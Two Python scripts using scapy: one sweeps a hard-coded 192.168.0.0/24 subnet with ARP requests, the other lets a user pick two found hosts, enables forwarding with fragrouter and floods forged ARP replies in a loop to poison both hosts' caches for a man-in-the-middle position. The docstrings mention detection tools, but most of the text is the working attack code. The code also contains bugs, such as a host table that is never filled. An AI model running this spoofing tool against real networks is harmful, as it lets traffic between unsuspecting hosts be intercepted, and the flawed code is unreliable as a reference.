<scan.py>
from scapy.all import *
import threading
import os
# Module-level state shared by the scanning worker threads.
# host_list: table that printHosts() reads as {index: (ip, mac)}.
host_list = {}
# num: running count of ARP answers; incremented in sendARP() while threadLock is held.
num = 0
# threadLock serialises the updates that the worker threads make to num and host_list.
threadLock = threading.Lock()
# threads: every Thread started by scanHosts(), kept so they can all be joined.
threads = []
def printHosts(host_list):
    """Print the host table to stdout.

    host_list maps an integer index to an (ip, mac) pair. One row is
    printed per entry, in the mapping's iteration order, between a fixed
    header and a closing rule.
    """
    rule = '---------------------------------------------------------------'
    print('-------------------------- HOST LIST --------------------------')
    print('NUM IP MAC')
    print(rule)
    for index, entry in host_list.items():
        # Each entry must unpack into exactly two values.
        ip, mac = entry
        print("%d %s %s" % (index, ip, mac))
    print(rule)
def sendARP(ip):
    """Send one broadcast ARP request for *ip* and count the answers.

    The request is sent with scapy's srp() using timeout=5 and retry=1.
    For every answered pair the shared counter ``num`` is incremented
    while ``threadLock`` is held.

    NOTE(review): ``host_list.update()`` is called without arguments, so
    as written this function adds no entry to ``host_list``.
    """
    global host_list, num
    probe = Ether(dst='ff:ff:ff:ff:ff:ff') / ARP(pdst=ip)
    answered, _unanswered = srp(probe, timeout=5, retry=1)
    for _sent, _reply in answered:
        # The lock guards the shared counter against the other scan threads.
        with threadLock:
            num += 1
            host_list.update()
def scanHosts():
    """Probe 192.168.0.1 through 192.168.0.255, print the table, return it.

    One thread running sendARP() is started per address and recorded in the
    module-level ``threads`` list. Once every recorded thread has been
    joined, the terminal is cleared with ``clear``, printHosts() is called,
    and the module-level ``host_list`` is returned.

    The subnet is hard-coded. For a defender, this many broadcast ARP
    requests from a single source in a short window is a recognisable
    sweep pattern.
    """
    for last_octet in range(1, 256):
        target = "192.168.0.%d" % last_octet
        worker = threading.Thread(target=sendARP, args=(target,))
        worker.start()
        threads.append(worker)
    # Wait for every probe to finish before the table is read.
    for worker in threads:
        worker.join()
    os.system('clear')
    printHosts(host_list)
    return host_list
<arp_spoofing.py>
from scan import *
from scapy.all import *
import os
def arpSpoof(vic1_ip, vic1_mac, vic2_ip, vic2_mac):
    """Build two ARP reply packets (op=2) and send each once.

    The first names vic1_ip as the sender toward vic2_ip; the second names
    vic2_ip as the sender toward vic1_ip. Both go out through scapy's
    send().

    Detection/mitigation: these are unsolicited ARP replies, the traffic
    that Dynamic ARP Inspection on a switch, static ARP entries, or an ARP
    monitor such as arpwatch is meant to catch or neutralise.
    """
    reply_to_second = ARP(op=2, psrc=vic1_ip, pdst=vic2_ip, hwdst=vic2_mac)
    reply_to_first = ARP(op=2, psrc=vic2_ip, pdst=vic1_ip, hwdst=vic2_mac)
    for packet in (reply_to_second, reply_to_first):
        send(packet)
def restoreARP(vic1_ip, vic1_mac, vic2_ip, vic2_mac):
    """Re-announce each host's own IP/MAC pair.

    Two ARP replies (op=2) are built. Each carries one host's IP as psrc
    and that same host's MAC as hwsrc, with the ARP target hardware
    address set to ff:ff:ff:ff:ff:ff. Each is sent three times (count=3)
    via scapy's send().
    """
    announce_first = ARP(
        op=2, psrc=vic1_ip, hwsrc=vic1_mac,
        pdst=vic2_ip, hwdst='ff:ff:ff:ff:ff:ff',
    )
    announce_second = ARP(
        op=2, psrc=vic2_ip, hwsrc=vic2_mac,
        pdst=vic1_ip, hwdst='ff:ff:ff:ff:ff:ff',
    )
    for packet in (announce_first, announce_second):
        send(packet, count=3)
def main():
    """Interactive entry point.

    Runs scanHosts(), reads two table indices from stdin, runs
    ``fragrouter -B1`` through os.system(), then calls arpSpoof() in an
    endless loop with the two selected (ip, mac) entries. On
    KeyboardInterrupt it calls restoreARP() with the same four values and
    prints the end message.

    The typed indices are converted with int() and used as host_list keys
    without validation, so a non-numeric or unknown index raises
    ValueError or KeyError, which is not caught here.
    """
    host_list = scanHosts()
    victim1 = input("Victim 1 : ")
    victim2 = input("Victim 2 : ")
    print("ARP Spoofing START")
    os.system("fragrouter -B1")
    # Resolve both entries once; the table is no longer written to after the scan.
    first = host_list[int(victim1)]
    second = host_list[int(victim2)]
    addresses = (first[0], first[1], second[0], second[1])
    try:
        while True:
            arpSpoof(*addresses)
    except KeyboardInterrupt:
        # Ctrl-C is the only exit path: re-announce the real bindings first.
        restoreARP(*addresses)
        print("ARP Spoofing END")
# Run main() only when this file is executed as a script, not when imported.
if __name__ == '__main__':
    main()